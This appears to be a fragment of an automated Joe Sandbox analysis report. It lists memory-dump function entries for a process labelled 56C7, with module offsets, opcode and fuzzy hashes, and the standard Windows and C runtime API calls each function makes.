                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleThread$CloseCreateErrorFreeLastLibraryModuleResume
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1364334503-0
                                                                                                                                                                                                  • Opcode ID: abb107f651fd450bd483c6b75e6516ba23bdd0948844ca67fb2ffd94d36fe676
                                                                                                                                                                                                  • Instruction ID: 3465445d0bb82eb367aeb8f0a9bf0b99e50103c553039f36062b99b0df5e25ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb107f651fd450bd483c6b75e6516ba23bdd0948844ca67fb2ffd94d36fe676
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F216825A0D70386EE185FA9B4503B962906F89B64F1B0735E9AE023F5DFBCD5408242
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                  • Instruction ID: 8ccab1ad8002e8d9c28fa8d106187d11915cf6e1f101da5ff3b6a71f580dd9d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1118F36ED8E0301F6543128D456375D9406F54374FA90634EAEE267DACEACB8498130
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                  • Opcode ID: d87a420c425093582bf0768a505271f7d8736b4892105bec4a5daca04c7c3215
                                                                                                                                                                                                  • Instruction ID: ec15b32e4da3ff332d2e17c79a97a5cc27b74356a009ca88190c8245167a0042
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d87a420c425093582bf0768a505271f7d8736b4892105bec4a5daca04c7c3215
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D117362E1CA1305FA5C1324F45937915416F54378F8B0A37E9EE076F7CEADA8C1C2A2
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA6BF
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA6DE
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA706
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA717
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA728
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                                  • Instruction ID: 66ee5f9612fc759b931c18fd11915d97f656c635c81065c6d0994ecae23fb31f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F112C22F08A4242FEA87326554257DE9925F987F0F944334E83E067D6DE2CFC098721
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                                  • Instruction ID: 88c1ea98a126f9ea5c926288430fd52cbdfc497cb9507fb21052a58264344d87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211FA22E09A0746FDA97326645257AAA824F49770FD84734D93E0A3D6ED3CFC495331
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                  • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                  • Instruction ID: 9328dd109421082572245c2f9f642832102b0b34dd5458bdb9688a6387424c74
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B891D033A08EA681F761AE25E45037DBA91AB00BA4FC44136DA9D463D5DFBCFC498321
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                  • Instruction ID: 29134c811a018837dc5ee0f554d851bd7cd78b66d906a9edc03598593bab3432
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35819073E0CA42C5FBA47F25C110A78BEA0AB11768FD58035CA0D9778ADB2DFD099325
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                  • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                  • Instruction ID: b6b447d6b983b8d08ad5bbe403cf915433e04bf022f359c82bb337cf7e29e650
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA51C632B29E0A8ADB14EF15E544679BB91FB44BA8FA08131EA4E43784DF7CF845C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                  • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                  • Instruction ID: 918e9f2ef7060659ce7f6be0d29e4ae08b8a62b74a9e19b979c1d3995270e9a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B619032918BC581DB35AB25E5403AAFBA0FB857A4F444225EB9D03B95DF7CF198CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                  • Instruction ID: 1cfa5c91c5d8fc93cc87e7ae6c83fde6226093d678302aa42090633369f1bee9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4951BF32A28A8286EF34AB219244378FBA4EB50BA4F945135DA5D43BD5CF3CF458CB11
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFEEE22F22F), ref: 00007FFEEE22D638
                                                                                                                                                                                                  • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFEEE22F22F), ref: 00007FFEEE22D700
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressCompareProcString
                                                                                                                                                                                                  • String ID: AppPolicyGetThreadInitializationType$CompareStringEx
                                                                                                                                                                                                  • API String ID: 108076903-1200376162
                                                                                                                                                                                                  • Opcode ID: 30d2520cc01e508eb23018c8aeae5952f2c3f42758c4307ec194bc7423b5993b
                                                                                                                                                                                                  • Instruction ID: 2ffb6b51be44010f4f942187d464415af4c3055c538ccdbb234171c935941b80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30d2520cc01e508eb23018c8aeae5952f2c3f42758c4307ec194bc7423b5993b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93318E31B08A4182EA648F15F8147B567E0FB8CB94F074235ED9D577A8EF7CE8458741
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,00007FFEEE2180CD,?,?,?,?,?,?,?,00000000), ref: 00007FFEEE22D8A2
                                                                                                                                                                                                  • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(?,?,?,?,?,?,?,00007FFEEE2180CD,?,?,?,?,?,?,?,00000000), ref: 00007FFEEE22D950
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressDateFormatProc
                                                                                                                                                                                                  • String ID: GetDateFormatEx$RoInitialize
                                                                                                                                                                                                  • API String ID: 2680382325-2816274727
                                                                                                                                                                                                  • Opcode ID: 3cbcdcd87a5581ac5b4be722e370957f0920fc86bcbb390c1353a9f807368591
                                                                                                                                                                                                  • Instruction ID: 0d5055999e2feb540cea86b054adb91c3780920071030cc6523a468660298251
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cbcdcd87a5581ac5b4be722e370957f0920fc86bcbb390c1353a9f807368591
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56315B71A09B0682FA148F26B81076567D1BB8CB90F074239EE9D577B8EFBCE805C745
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,00007FFEEE218170,?,?,?,?,?,?,?,00000000), ref: 00007FFEEE22DBDE
                                                                                                                                                                                                  • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(?,?,?,?,?,?,?,00007FFEEE218170,?,?,?,?,?,?,?,00000000), ref: 00007FFEEE22DC86
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFormatProcTime
                                                                                                                                                                                                  • String ID: GetTimeFormatEx$RoInitialize
                                                                                                                                                                                                  • API String ID: 3572143191-3078538569
                                                                                                                                                                                                  • Opcode ID: 50b84c3166a7a606b15ed9c35499d240a258922d1085a1f3b1407689fb808eb0
                                                                                                                                                                                                  • Instruction ID: e2f4ded0d5711209732928967c8e97ec0c1bb67a918a8480f8f97496e0c9198e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50b84c3166a7a606b15ed9c35499d240a258922d1085a1f3b1407689fb808eb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63315A71A09B4282FA148F26B81066567D1BBCCBD4F074239DE8D577B8EFBCE8018745
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF7102C324C,?,?,00007FF7102C3964), ref: 00007FF7102C7642
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                  • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                  • Instruction ID: f1a4b413d3b3a77257b47a7f678ab4d444ef636e31ef44967624b316e8087687
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831E821629EC585EA21AB24E5107EAA758FF44BF4FD44231EE6D43BC9DE3CE6098710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1D34B6,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE1D6355
                                                                                                                                                                                                  • TlsSetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE1D34B6,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE21347A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProcValue
                                                                                                                                                                                                  • String ID: FlsSetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 1414840956-3586097892
                                                                                                                                                                                                  • Opcode ID: e8f73a9f15f5acc4ace477647e8abd823f3b94cfbf3b3b9d69bf812f061f4f2f
                                                                                                                                                                                                  • Instruction ID: 32d3333ca5cbc0f62a483d3775bfc9dcbfa3244f6d96aeaaf772df1c46e2f285
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8f73a9f15f5acc4ace477647e8abd823f3b94cfbf3b3b9d69bf812f061f4f2f
